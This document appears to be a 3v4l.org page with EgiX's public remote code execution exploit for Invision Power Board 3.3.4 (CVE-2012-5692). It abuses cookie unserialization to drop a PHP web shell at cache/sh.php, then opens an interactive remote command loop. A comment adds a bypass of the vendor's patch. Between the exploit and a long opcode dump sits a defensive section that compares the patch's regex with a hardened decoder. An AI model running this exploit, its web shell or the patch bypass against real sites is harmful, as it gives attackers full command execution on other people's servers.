3v4l.org

<?php

/*
    ----------------------------------------------------------------
    Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution
    ----------------------------------------------------------------

    author..............: Egidio Romano aka EgiX
    mail................: n0b0d13s[at]gmail[dot]com
    software link.......: http://www.invisionpower.com/

    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+

    [-] Vulnerable code in IPSCookie::get() method defined in /admin/sources/base/core.php

    4015.     static public function get($name)
    4016.     {
    4017.         // Check internal data first
    4018.         if ( isset( self::$_cookiesSet[ $name ] ) )
    4019.         {
    4020.             return self::$_cookiesSet[ $name ];
    4021.         }
    4022.         else if ( isset( $_COOKIE[ipsRegistry::$settings['cookie_id'].$name] ) )
    4023.         {
    4024.             $_value = $_COOKIE[ ipsRegistry::$settings['cookie_id'].$name ];
    4025.
    4026.             if ( substr( $_value, 0, 2 ) == 'a:' )
    4027.             {
    4028.                 return unserialize( stripslashes( urldecode( $_value ) ) );
    4029.             }

    The vulnerability is caused by this method unserializing user input passed
    through cookies without proper sanitization. The only check is done at line
    4026, which verifies that the serialized string starts with 'a:', but this
    is not sufficient to prevent "PHP Object Injection" because an attacker may
    send a serialized string which represents an array of objects. This can be
    exploited to execute arbitrary PHP code via the "__destruct()" method of the
    "dbMain" class, which calls the "writeDebugLog" method to write debug info
    into a file. PHP code may be injected only through the
    $_SERVER['QUERY_STRING'] variable; for this reason successful exploitation
    of this vulnerability requires short_open_tag to be enabled.

    [-] Disclosure timeline:

    [21/10/2012] - Vulnerability discovered
    [23/10/2012] - Vendor notified
    [25/10/2012] - Patch released: http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-security-update
    [25/10/2012] - CVE number requested
    [29/10/2012] - Assigned CVE-2012-5692
    [31/10/2012] - Public disclosure
*/

error_reporting(0);
set_time_limit(0);
ini_set('default_socket_timeout', 5);

function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n");
    fputs($sock, $packet);
    return stream_get_contents($sock);
}

print "\n+---------------------------------------------------------------------+";
print "\n| Invision Power Board <= 3.3.4 Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /ipb/\n";
    die();
}

list($host, $path) = array($argv[1], $argv[2]);

$packet  = "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";

$_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : '';

class db_driver_mysql
{
    public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php');
}

$payload = urlencode(serialize(array(new db_driver_mysql)));
$phpcode = '<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?>';

$packet  = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$_prefix}member_id={$payload}\r\n";
$packet .= "Connection: close\r\n\r\n";

http_send($host, $packet);

$packet  = "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

if (preg_match('/<\?error/', http_send($host, $packet))) die("\n[-] short_open_tag disabled!\n");

while(1)
{
    print "\nipb-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}

/*
    So this is the patch that sanitizes,

    static public function safeUnserialize( $serialized )
    {
        // unserialize will return false for object declared with small cap o
        // as well as if there is any ws between O and :
        if ( is_string( $serialized ) && strpos( $serialized, "\0" ) === false )
        {
            if ( strpos( $serialized, 'O:' ) === false )
            {
                // the easy case, nothing to worry about
                // let unserialize do the job
                return @unserialize( $serialized );
            }
            else if ( ! preg_match('/(^|;|{|})O:[0-9]+:"/', $serialized ) )
            {
                // in case we did have a string with O: in it,
                // but it was not a true serialized object
                return @unserialize( $serialized );
            }
        }

        return false;
    }

    And this is what bypasses it ( By @i0n1c )

    $payload = urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}');

    Which makes this an IPB 0day. lulz! - webDEViL
*/

?>
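The script above shows two failed defences for the same cookie: the original two-byte 'a:' prefix test, and the patch's regex that only recognises `O:<digits>:` and so lets `O:+15:` through. The following is an added example, not code from the 3v4l page, from EgiX's exploit or from Invision Power Board: it reproduces the patch's regex as a predicate to expose that blind spot, and puts a hardened reader beside it that never instantiates a class from cookie data at all. It assumes PHP 7.0 or later for the `allowed_classes` option of `unserialize()`; `DestructorProbe` is a constructed stand-in for a gadget class such as the page's `db_driver_mysql`/`dbMain` (its destructor only counts how often it ran), and the three cookie strings are constructed samples shaped like the payloads quoted on the page.

```php
<?php
// Added example, not from the 3v4l page, the exploit or IPB's code base.
// Assumes PHP >= 7.0 (allowed_classes option of unserialize()).

// Constructed stand-in for a gadget class: the destructor has no side effect
// except counting, so we can observe whether a decode path brought a
// user-controlled object to life.
final class DestructorProbe
{
    public static $fired = 0;
    public $obj = array();
    public function __destruct() { self::$fired++; }
}

// The gate from the patch quoted on the page, as a pure predicate (it does not
// unserialize anything). It only recognises the exact shape O:<digits>:".
function patch_regex_says_object_free($s)
{
    return strpos($s, 'O:') === false || !preg_match('/(^|;|{|})O:[0-9]+:"/', $s);
}

// Hardened reader: arrays only, and no class is ever instantiated.
// allowed_classes => false turns every O: record into __PHP_Incomplete_Class,
// whose user-level __destruct/__wakeup never run; the whole value is still
// refused if any object-shaped leaf remains, so the caller only ever sees
// plain arrays of scalars.
function safe_cookie_array($value)
{
    if (!is_string($value) || substr($value, 0, 2) !== 'a:') {
        return null;
    }
    $decoded = @unserialize($value, array('allowed_classes' => false));
    if (!is_array($decoded)) {
        return null; // false (parse failure) or a scalar: not an array cookie
    }
    $hasObject = false;
    array_walk_recursive($decoded, function ($leaf) use (&$hasObject) {
        if (is_object($leaf)) {
            $hasObject = true;
        }
    });
    return $hasObject ? null : $decoded;
}

// Preferable design for new code: a format that cannot express objects at all.
function json_cookie_array($value)
{
    $decoded = json_decode((string) $value, true, 8);
    return is_array($decoded) ? $decoded : null;
}

// Constructed sample cookies (already URL-decoded, as PHP delivers $_COOKIE):
// a benign array, an array holding an object, and the "O:+15:" variant.
function sample_cookies()
{
    $benign = 'a:1:{s:9:"member_id";i:42;}';
    $inject = 'a:1:{i:0;O:15:"DestructorProbe":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}';
    $bypass = str_replace('O:15:', 'O:+15:', $inject);
    return array('benign' => $benign, 'inject' => $inject, 'bypass' => $bypass);
}

// Runs every sample through the regex gate and the hardened reader and reports
// whether the probe's destructor fired. Expected: the regex gate calls both
// 'benign' and 'bypass' object-free; the hardened reader accepts only 'benign'
// (on any PHP version 'bypass' ends as null, either because the parser rejects
// the '+' or because the result holds an incomplete-class object); and
// destructor_ran is false for all three.
function run_checks()
{
    $results = array();
    foreach (sample_cookies() as $name => $cookie) {
        $before = DestructorProbe::$fired;
        $safe   = safe_cookie_array($cookie);
        $results[$name] = array(
            'regex_gate_passes' => patch_regex_says_object_free($cookie),
            'hardened_accepts'  => $safe !== null,
            'destructor_ran'    => DestructorProbe::$fired > $before,
        );
    }
    return $results;
}

print_r(run_checks());
```

The point of the comparison is that any check which pattern-matches the serialized text is racing PHP's own parser, and the parser's leniencies (a signed length, here) are what the check has to predict; refusing to instantiate classes at all, or moving cookie state to JSON, removes that race instead of patching it.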
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 15, Position 2 = 31
Branch analysis from position: 15
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 31
2 jumps found. (Code = 43) Position 1 = 59, Position 2 = 62
Branch analysis from position: 59
1 jumps found. (Code = 42) Position 1 = 63
Branch analysis from position: 63
2 jumps found. (Code = 43) Position 1 = 115, Position 2 = 116
Branch analysis from position: 115
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 116
1 jumps found. (Code = 42) Position 1 = 154
Branch analysis from position: 154
2 jumps found. (Code = 44) Position 1 = 155, Position 2 = 117
Branch analysis from position: 155
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 117
2 jumps found. (Code = 43) Position 1 = 128, Position 2 = 129
Branch analysis from position: 128
1 jumps found. (Code = 42) Position 1 = 155
Branch analysis from position: 155
Branch analysis from position: 129
2 jumps found. (Code = 43) Position 1 = 147, Position 2 = 151
Branch analysis from position: 147
1 jumps found. (Code = 42) Position 1 = 153
Branch analysis from position: 153
2 jumps found. (Code = 44) Position 1 = 155, Position 2 = 117
Branch analysis from position: 155
Branch analysis from position: 117
Branch analysis from position: 151
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 62
2 jumps found. (Code = 43) Position 1 = 115, Position 2 = 116
Branch analysis from position: 115
Branch analysis from position: 116
filename:       /in/0icii
function name:  (null)
number of ops:  156
compiled vars:  !0 = $argc, !1 = $argv, !2 = $host, !3 = $path, !4 = $packet, !5 = $_prefix, !6 = $m, !7 = $payload, !8 = $phpcode, !9 = $cmd, !10 = $response
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   54     0  E >   INIT_FCALL                                               'error_reporting'
          1        SEND_VAL                                                 0
          2        DO_ICALL                                                 
   55     3        INIT_FCALL                                               'set_time_limit'
          4        SEND_VAL                                                 0
          5        DO_ICALL                                                 
   56     6        INIT_FCALL                                               'ini_set'
          7        SEND_VAL                                                 'default_socket_timeout'
          8        SEND_VAL                                                 5
          9        DO_ICALL                                                 
   65    10        ECHO                                                     '%0A%2B---------------------------------------------------------------------%2B'
   66    11        ECHO                                                     '%0A%7C+Invision+Power+Board+%3C%3D+3.3.4+Remote+Code+Execution+Exploit+by+EgiX+%7C'
   67    12        ECHO                                                     '%0A%2B---------------------------------------------------------------------%2B%0A'
   69    13        IS_SMALLER                                               !0, 3
         14      > JMPZ                                                     ~14, ->31
   71    15    >   ROPE_INIT                                     3  ~17     '%0AUsage......%3A+php+'
         16        FETCH_DIM_R                                      ~15     !1, 0
         17        ROPE_ADD                                      1  ~17     ~17, ~15
         18        ROPE_END                                      2  ~16     ~17, '+%3Chost%3E+%3Cpath%3E%0A'
         19        ECHO                                                     ~16
   72    20        ROPE_INIT                                     3  ~21     '%0AExample....%3A+php+'
         21        FETCH_DIM_R                                      ~19     !1, 0
         22        ROPE_ADD                                      1  ~21     ~21, ~19
         23        ROPE_END                                      2  ~20     ~21, '+localhost+%2F'
         24        ECHO                                                     ~20
   73    25        ROPE_INIT                                     3  ~25     '%0AExample....%3A+php+'
         26        FETCH_DIM_R                                      ~23     !1, 0
         27        ROPE_ADD                                      1  ~25     ~25, ~23
         28        ROPE_END                                      2  ~24     ~25, '+localhost+%2Fipb%2F%0A'
         29        ECHO                                                     ~24
   74    30      > EXIT                                                     
   77    31    >   FETCH_DIM_R                                      ~27     !1, 1
         32        INIT_ARRAY                                       ~28     ~27
         33        FETCH_DIM_R                                      ~29     !1, 2
         34        ADD_ARRAY_ELEMENT                                ~28     ~29
         35        FETCH_LIST_R                                     $30     ~28, 0
         36        ASSIGN                                                   !2, $30
         37        FETCH_LIST_R                                     $32     ~28, 1
         38        ASSIGN                                                   !3, $32
         39        FREE                                                     ~28
   79    40        ROPE_INIT                                     3  ~35     'GET+'
         41        ROPE_ADD                                      1  ~35     ~35, !3
         42        ROPE_END                                      2  ~34     ~35, 'index.php+HTTP%2F1.0%0D%0A'
         43        ASSIGN                                                   !4, ~34
   80    44        ROPE_INIT                                     3  ~39     'Host%3A+'
         45        ROPE_ADD                                      1  ~39     ~39, !2
         46        ROPE_END                                      2  ~38     ~39, '%0D%0A'
         47        ASSIGN_OP                                     8          !4, ~38
   81    48        ASSIGN_OP                                     8          !4, 'Connection%3A+close%0D%0A%0D%0A'
   83    49        INIT_FCALL                                               'preg_match'
         50        SEND_VAL                                                 '%2FCookie%3A+%28.%2B%29session%2F'
         51        INIT_FCALL                                               'http_send'
         52        SEND_VAR                                                 !2
         53        SEND_VAR                                                 !4
         54        DO_FCALL                                      0  $43     
         55        SEND_VAR                                                 $43
         56        SEND_REF                                                 !6
         57        DO_ICALL                                         $44     
         58      > JMPZ                                                     $44, ->62
         59    >   FETCH_DIM_R                                      ~45     !6, 1
         60        QM_ASSIGN                                        ~46     ~45
         61      > JMP                                                      ->63
         62    >   QM_ASSIGN                                        ~46     ''
         63    >   ASSIGN                                                   !5, ~46
   90    64        INIT_FCALL                                               'urlencode'
         65        INIT_FCALL                                               'serialize'
         66        NEW                                              $48     'db_driver_mysql'
         67        DO_FCALL                                      0          
         68        INIT_ARRAY                                       ~50     $48
         69        SEND_VAL                                                 ~50
         70        DO_ICALL                                         $51     
         71        SEND_VAR                                                 $51
         72        DO_ICALL                                         $52     
         73        ASSIGN                                                   !7, $52
   91    74        ASSIGN                                                   !8, '%3C%3Ferror_reporting%280%29%3Bprint%28___%29%3Bpassthru%28base64_decode%28%24_SERVER%5BHTTP_CMD%5D%29%29%3Bdie%3B%3F%3E'
   93    75        ROPE_INIT                                     5  ~56     'GET+'
         76        ROPE_ADD                                      1  ~56     ~56, !3
         77        ROPE_ADD                                      2  ~56     ~56, 'index.php%3F'
         78        ROPE_ADD                                      3  ~56     ~56, !8
         79        ROPE_END                                      4  ~55     ~56, '+HTTP%2F1.0%0D%0A'
         80        ASSIGN                                                   !4, ~55
   94    81        ROPE_INIT                                     3  ~61     'Host%3A+'
         82        ROPE_ADD                                      1  ~61     ~61, !2
         83        ROPE_END                                      2  ~60     ~61, '%0D%0A'
         84        ASSIGN_OP                                     8          !4, ~60
   95    85        ROPE_INIT                                     5  ~65     'Cookie%3A+'
         86        ROPE_ADD                                      1  ~65     ~65, !5
         87        ROPE_ADD                                      2  ~65     ~65, 'member_id%3D'
         88        ROPE_ADD                                      3  ~65     ~65, !7
         89        ROPE_END                                      4  ~64     ~65, '%0D%0A'
         90        ASSIGN_OP                                     8          !4, ~64
   96    91        ASSIGN_OP                                     8          !4, 'Connection%3A+close%0D%0A%0D%0A'
   98    92        INIT_FCALL                                               'http_send'
         93        SEND_VAR                                                 !2
         94        SEND_VAR                                                 !4
         95        DO_FCALL                                      0          
  100    96        ROPE_INIT                                     3  ~72     'GET+'
         97        ROPE_ADD                                      1  ~72     ~72, !3
         98        ROPE_END                                      2  ~71     ~72, 'cache%2Fsh.php+HTTP%2F1.0%0D%0A'
         99        ASSIGN                                                   !4, ~71
  101   100        ROPE_INIT                                     3  ~76     'Host%3A+'
        101        ROPE_ADD                                      1  ~76     ~76, !2
        102        ROPE_END                                      2  ~75     ~76, '%0D%0A'
        103        ASSIGN_OP                                     8          !4, ~75
  102   104        ASSIGN_OP                                     8          !4, 'Cmd%3A+%25s%0D%0A'
  103   105        ASSIGN_OP                                     8          !4, 'Connection%3A+close%0D%0A%0D%0A'
  105   106        INIT_FCALL                                               'preg_match'
        107        SEND_VAL                                                 '%2F%3C%5C%3Ferror%2F'
        108        INIT_FCALL                                               'http_send'
        109        SEND_VAR                                                 !2
        110        SEND_VAR                                                 !4
        111        DO_FCALL                                      0  $81     
        112        SEND_VAR                                                 $81
        113        DO_ICALL                                         $82     
        114      > JMPZ                                                     $82, ->116
        115    > > EXIT                                                     '%0A%5B-%5D+short_open_tag+disabled%21%0A'
  107   116    > > JMP                                                      ->154
  109   117    >   ECHO                                                     '%0Aipb-shell%23+'
  110   118        INIT_FCALL                                               'trim'
        119        INIT_FCALL                                               'fgets'
        120        FETCH_CONSTANT                                   ~83     'STDIN'
        121        SEND_VAL                                                 ~83
        122        DO_ICALL                                         $84     
        123        SEND_VAR                                                 $84
        124        DO_ICALL                                         $85     
        125        ASSIGN                                           ~86     !9, $85
        126        IS_EQUAL                                                 ~86, 'exit'
        127      > JMPZ                                                     ~87, ->129
        128    > > JMP                                                      ->155
  111   129    >   INIT_FCALL                                               'http_send'
        130        SEND_VAR                                                 !2
        131        INIT_FCALL                                               'sprintf'
        132        SEND_VAR                                                 !4
        133        INIT_FCALL                                               'base64_encode'
        134        SEND_VAR                                                 !9
        135        DO_ICALL                                         $88     
        136        SEND_VAR                                                 $88
        137        DO_ICALL                                         $89     
        138        SEND_VAR                                                 $89
        139        DO_FCALL                                      0  $90     
        140        ASSIGN                                                   !10, $90
  112   141        INIT_FCALL                                               'preg_match'
        142        SEND_VAL                                                 '%2F___%28.%2A%29%2Fs'
        143        SEND_VAR                                                 !10
        144        SEND_REF                                                 !6
        145        DO_ICALL                                         $92     
        146      > JMPZ                                                     $92, ->151
        147    >   FETCH_DIM_R                                      ~93     !6, 1
        148        ECHO                                                     ~93
        149        QM_ASSIGN                                        ~94     1
        150      > JMP                                                      ->153
        151    > > EXIT                                                     '%0A%5B-%5D+Exploit+failed%21%0A'
        152*       QM_ASSIGN                                        ~94     <true>
        153    >   FREE                                                     ~94
  107   154    > > JMPNZ                                                    1, ->117
  150   155    > > RETURN                                                   1

Function http_send:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 9, Position 2 = 13
Branch analysis from position: 9
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 13
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/0icii
function name:  http_send
number of ops:  22
compiled vars:  !0 = $host, !1 = $packet, !2 = $sock
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   58     0  E >   RECV                                             !0      
          1        RECV                                             !1      
   60     2        INIT_FCALL                                               'fsockopen'
          3        SEND_VAR                                                 !0
          4        SEND_VAL                                                 80
          5        DO_ICALL                                         $3      
          6        ASSIGN                                           ~4      !2, $3
          7        BOOL_NOT                                         ~5      ~4
          8      > JMPZ                                                     ~5, ->13
          9    >   ROPE_INIT                                     3  ~7      '%0A%5B-%5D+No+response+from+'
         10        ROPE_ADD                                      1  ~7      ~7, !0
         11        ROPE_END                                      2  ~6      ~7, '%3A80%0A'
         12      > EXIT                                                     ~6
   61    13    >   INIT_FCALL                                               'fputs'
         14        SEND_VAR                                                 !2
         15        SEND_VAR                                                 !1
         16        DO_ICALL                                                 
   62    17        INIT_FCALL                                               'stream_get_contents'
         18        SEND_VAR                                                 !2
         19        DO_ICALL                                         $10     
         20      > RETURN                                                   $10
   63    21*     > RETURN                                                   null

End of function http_send

Class db_driver_mysql: [no user functions]

Generated using Vulcan Logic Dumper, using php 8.0.0

